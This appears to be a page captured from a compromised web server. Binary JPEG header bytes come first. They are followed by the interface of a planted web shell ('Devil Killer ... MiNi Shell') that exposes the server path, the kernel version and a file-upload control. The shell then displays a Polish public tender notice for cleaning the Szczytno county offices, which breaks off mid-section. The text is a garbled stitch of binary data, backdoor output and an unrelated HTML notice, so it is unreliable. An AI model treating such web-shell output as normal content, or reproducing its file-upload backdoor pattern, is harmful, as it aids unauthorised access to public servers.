JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241216/0065525801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługa sprzątania pomieszczeń Starostwa Powiatowego w Szczytnie wraz z przyległym terenem </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT SZCZYCIEŃSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510742534</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Henryka Sienkiewicza 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Szczytno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">12-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zampubl@powiat.szczytno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://powiatszczycienski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługa sprzątania pomieszczeń Starostwa Powiatowego w Szczytnie wraz z przyległym terenem </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-048354b4-1842-4562-b122-e2974b5ca761</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00655258</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00070139/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Usługa sprzątania pomieszczeń Starostwa Powiatowego w Szczytnie wraz z przyległym terenem</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-048354b4-1842-4562-b122-e2974b5ca761 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. Komunikacja w postępowaniu, z wyłączeniem składania ofert w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem<br/>formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”).<br/>SKŁADANIE OFERT odbywa się drogą elektroniczną. Szczegółowe informacje zawarte zostały w rozdziale: VII SWZ: INFORMACJE O ŚRODKACH KOMUNIKACJI ELEKTRONICZNEJ, PRZY UŻYCIU KTÓRYCH ZAMAWIAJĄCY BĘDZIE KOMUNIKOWAŁ SIĘ Z WYKONAWCAMI, ORAZ INFORMACJE O WYMAGANIACH TECHNICZNYCH I ORGANIZACYJNYCH SPORZĄDZANIA, WYSYŁANIA I ODBIERANIA KORESPONDENCJI ELEKTRONICZNEJ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Oferta oraz przedmiotowe środki dowodowe (jeżeli są wymagane w SWZ) muszą być sporządzone w języku polskim, w postaci elektronicznej w formacie danych: .pdf, .doc, .docx, .rtf,.xps, .odt i opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>2. Formularz ofertowy podpisuje się kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Rekomendowanym wariantem podpisu jest typ wewnętrzny.<br/>3. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>4. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>5. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>Szczegółowe informacje zawarte zostały w rozdziale: VII SWZ: INFORMACJE O ŚRODKACH KOMUNIKACJI ELEKTRONICZNEJ, PRZY UŻYCIU KTÓRYCH ZAMAWIAJĄCY BĘDZIE KOMUNIKOWAŁ SIĘ Z WYKONAWCAMI, ORAZ INFORMACJE O WYMAGANIACH TECHNICZNYCH I ORGANIZACYJNYCH SPORZĄDZANIA, WYSYŁANIA I ODBIERANIA KORESPONDENCJI ELEKTRONICZNEJ, rozdziale X SWZ: OPIS SPOSOBU PRZYGOTOWANIA OFERT i rozdziale XI: SPOSÓB ORAZ TERMIN SKŁADANIA OFERT.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Szczegółowe informacje zawarte zostały w rozdziale XXVII SWZ: OCHRONA DANYCH OSOBOWYCH.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Szczegółowe informacje zawarte zostały w rozdziale XXVII SWZ: OCHRONA DANYCH OSOBOWYCH.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Rz.272.14.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 zamówienia dot. usługi sprzątania pomieszczeń Starostwa Powiatowego w Szczytnie mieszczących się w budynku Ratusza przy ul. Sienkiewicza 1 w Szczytnie.<br/>Szczegółowy opis przedmiotu zamówienia został opisany w Załączniku nr 1 do SWZ – „Szczegółowy opis przedmiotu zamówienia”. <br/>Obowiązki i zobowiązania Wykonawcy zawarto w Projektowanych postanowieniach umowy – dla części 1 zamówienia jest to Załącznik nr 8A do SWZ.<br/>Dla Części 1 zamówienia Zamawiający przewiduje możliwość skorzystania z prawa opcji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90910000-9 - Usługi sprzątania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90919200-4 - Usługi sprzątania biur</p> <p class="mb-0">90914000-7 - Usługi sprzątania parkingów</p> <p class="mb-0">90620000-9 - Usługi odśnieżania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Dla Części 1 zamówienia Zamawiający przewiduje możliwość skorzystania z prawa opcji na warunkach: <br/>a)	Rodzaj i maksymalna wartość opcji:<br/>Prawo opcji obejmuje możliwość rozszerzenia podstawowego przedmiotu o dodatkowy zakres czynności wskazany w Szczegółowym opisie przedmiotu zamówienia, w części dotyczącej części 1 zamówienia, za dodatkowym wynagrodzeniem, które nie przekroczy 15% maksymalnego wynagrodzenia za wykonanie przedmiotu umowy w zakresie podstawowym, z zastrzeżeniem, że dzienne wynagrodzenie za wykonanie usługi objętej prawem opcji będzie wynosić kwotę, o której mowa w §3 ust.3 Umowy. Stawkę dot. dziennego wynagrodzenie za wykonanie usługi objętej prawem opcji Wykonawca zobowiązany będzie podać w Formularzu ofertowym.<br/>b)	Okoliczności skorzystania z opcji: Zamawiający może skorzystać z prawa opcji w sytuacji, gdy zajdzie potrzeba skorzystania z zastępstwa a wartość zamówienia w ramach prawa opcji nie zostanie wyczerpana. Dodatkowy zakres czynności realizowany będzie w okresie 48 godzin od zgłoszenia przez Zamawiającego na adres e-mail wskazany w §5 ust. 2 Umowy.<br/>c)	Warunki opcji nie modyfikują ogólnego charakteru umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający kierował się będzie następującymi kryteriami i ich wagami: <br/>a)	cena oferty brutto – waga 60% = 60 pkt,<br/>b)	częstotliwość mycia okien w pomieszczeniach biurowych – waga 30% = 30 pkt,<br/>c)	częstotliwość mycia okien na korytarzach, klatkach schodowych i toaletach – waga 10% = 10 pkt.<br/><br/>2.	Zamawiający przyjmuje, że 1% odpowiada 1 pkt. Oferty będą oceniane w skali 0 - 100 pkt.<br/>3.	Całkowita liczba punktów, jaką otrzyma oferta, zostanie obliczona wg poniższego wzoru: <br/><br/>L = C + OB + OK<br/> gdzie:<br/>L - całkowita liczba punktów,<br/>C - punkty uzyskane w kryterium – cena oferty brutto,<br/>OB - punkty uzyskane w kryterium – częstotliwość mycia okien w pomieszczeniach biurowych,<br/>OK - punkty uzyskane w kryterium – częstotliwość mycia okien na korytarzach, klatkach schodowych i toaletach.<br/>Dotyczy części 1 zamówienia:<br/>4.	Ocena ofert zostanie przeprowadzona wyłącznie na podstawie przedstawionych w tym Rozdziale kryteriów.<br/>5.	Kryterium określone w ust. 1 lit. a – cena oferty brutto (C) oceniane będzie według poniższych zasad i wzoru:<br/>1)	Cena oferty brutto jest ceną za wykonanie maksymalnego zakresu umowy, tj. objętego zamówieniem podstawowym i prawem opcji. <br/>2)	W załączniku nr 3A do SWZ tj. Formularzu asortymentowo-cenowym, w części dotyczącej „Zamówienia podstawowego” - wskazano szacunkową ilość miesięcy (11). Dana ta służy jedynie porównaniu ofert. Zamawiający dopuszcza zmianę tej danej. <br/>3)	W załączniku nr 3A do SWZ tj. Formularzu asortymentowo-cenowym, w części dotyczącej „Prawa opcji” - wskazano szacunkową ilość dni roboczych (26). Dana ta służy jedynie porównaniu ofert. Zamawiający dopuszcza zmianę tej danej. Całkowite maksymalne wynagrodzenie za wykonanie przedmiotu umowy objętego prawem opcji, zgodnie z zapisami w Projektowanych postanowieniach umowy, nie przekroczy 15% maksymalnego wynagrodzenia za wykonanie przedmiotu umowy w zakresie podstawowym. <br/>4)	Opcja jest uprawnieniem Zamawiającego, z którego może, ale nie musi skorzystać. Nie jest tym samym źródłem zobowiązania Zamawiającego w momencie udzielania zamówienia.<br/>5)	Wykonawca określi cenę oferty w kwocie brutto.<br/>6)	Cena oferty musi zawierać wszystkie koszty niezbędne do zrealizowania zamówienia wynikające wprost z opisu przedmiotu zamówienia, jak również koszty nie ujęte bądź też wprost nie wynikające z opisu przedmiotu zamówienia.<br/>7)	Zamawiający wymaga podania w formularzu oferty ceny brutto, z dokładnością do dwóch miejsc po przecinku. <br/>8)	Wzór do wyliczenia punktacji:<br/><br/>cena oferty brutto najtańszej<br/> C = ------------------------------------------ x 60 pkt<br/> cena oferty brutto ocenianej<br/><br/><br/>6.	Kryterium określone w ust. 1 lit. b - częstotliwość mycia okien w pomieszczeniach biurowych (OB), oceniane będzie w następujący sposób:<br/><br/>UWAGA: Limit znaków.<br/>Pozostała część opisu w SWZ: XVII Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert, w Części dot. Części 1 zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">częstotliwość mycia okien w pomieszczeniach biurowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">częstotliwość mycia okien na korytarzach, klatkach schodowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 zamówienia dot. usługi sprzątania pomieszczeń Starostwa Powiatowego w Szczytnie mieszczących się w budynku przy ul. Kościuszki 14 w Szczytnie wraz z przyległym terenem.<br/>Szczegółowy opis przedmiotu zamówienia został opisany w Załączniku nr 1 do SWZ – „Szczegółowy opis przedmiotu zamówienia”. <br/>Obowiązki i zobowiązania Wykonawcy zawarto w Projektowanych postanowieniach umowy – dla części 2 zamówienia jest to Załącznik nr 8B do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90910000-9 - Usługi sprzątania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90919200-4 - Usługi sprzątania biur</p> <p class="mb-0">90914000-7 - Usługi sprzątania parkingów</p> <p class="mb-0">90620000-9 - Usługi odśnieżania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający kierował się będzie następującymi kryteriami i ich wagami: <br/>a)	cena oferty brutto – waga 60% = 60 pkt,<br/>b)	częstotliwość mycia okien w pomieszczeniach biurowych – waga 30% = 30 pkt,<br/>c)	częstotliwość mycia okien na korytarzach, klatkach schodowych i toaletach – waga 10% = 10 pkt.<br/><br/>2.	Zamawiający przyjmuje, że 1% odpowiada 1 pkt. Oferty będą oceniane w skali 0 - 100 pkt.<br/>3.	Całkowita liczba punktów, jaką otrzyma oferta, zostanie obliczona wg poniższego wzoru: <br/><br/><br/>L = C + OB + OK<br/> gdzie:<br/>L - całkowita liczba punktów,<br/>C - punkty uzyskane w kryterium – cena oferty brutto,<br/>OB - punkty uzyskane w kryterium – częstotliwość mycia okien w pomieszczeniach biurowych,<br/>OK - punkty uzyskane w kryterium – częstotliwość mycia okien na korytarzach, klatkach schodowych i toaletach.<br/><br/>Dotyczy części 2 zamówienia:<br/>4.	Ocena ofert zostanie przeprowadzona wyłącznie na podstawie przedstawionych w tym Rozdziale kryteriów.<br/>5.	W załączniku nr 3B do SWZ tj. Formularzu asortymentowo-cenowym - wskazano szacunkową ilość miesięcy (11). Dana ta służy jedynie porównaniu ofert. Zamawiający dopuszcza zmianę tej danej. <br/>6.	Kryterium określone w ust. 1 lit. a – cena oferty brutto (C) oceniane będzie według poniższych zasad i wzoru:<br/>1)	Cena oferty brutto jest ceną za wykonanie całego przedmiotu zamówienia (sprzątanie budynku i terenu przyległego). <br/>2)	Wykonawca określi cenę oferty w kwocie brutto.<br/>3)	Cena oferty musi zawierać wszystkie koszty niezbędne do zrealizowania zamówienia wynikające wprost z opisu przedmiotu zamówienia, jak również koszty nie ujęte bądź też wprost nie wynikające z opisu przedmiotu zamówienia.<br/>4)	Zamawiający wymaga podania w formularzu ofertowym ceny brutto, z dokładnością do dwóch miejsc po przecinku. <br/>5)	Wzór do wyliczenia punktacji:<br/><br/>cena oferty brutto najtańszej<br/> C = ------------------------------------------ x 60 pkt<br/> cena oferty brutto ocenianej<br/><br/><br/>7.	Kryterium określone w ust. 1 lit. b - częstotliwość mycia okien w pomieszczeniach biurowych (OB), oceniane będzie w następujący sposób:<br/><br/><br/>UWAGA: Limit znaków.<br/>Pozostała część opisu w SWZ: XVII Opis kryteriów oceny ofert, wraz z podaniem wag tych kryteriów i sposobu oceny ofert, w Części dot. Części 2 zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">częstotliwość mycia okien w pomieszczeniach biurowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">częstotliwość mycia okien na korytarzach, klatkach schodowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu z postępowania: na podstawie art. 108 ust. 1 ustawy Pzp oraz fakultatywnych podstawach wykluczenia, o których mowa w Rozdziale XIV SWZ, <br/>2)	spełniają warunki udziału w postępowaniu dotyczące:<br/>a)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. <br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>c)	